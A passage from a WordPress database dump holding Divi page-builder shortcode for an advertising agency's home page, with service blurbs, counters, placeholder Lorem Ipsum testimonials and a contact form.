max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-4.jpg\" alt=\"marketing strategy\" title_text=\"marketing strategy\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-06 20:48:11','2020-08-06 20:48:11','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/06/134-revision-v1/',0,'revision','',0),(441,1,'2020-08-06 20:48:30','2020-08-06 20:48:30','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" 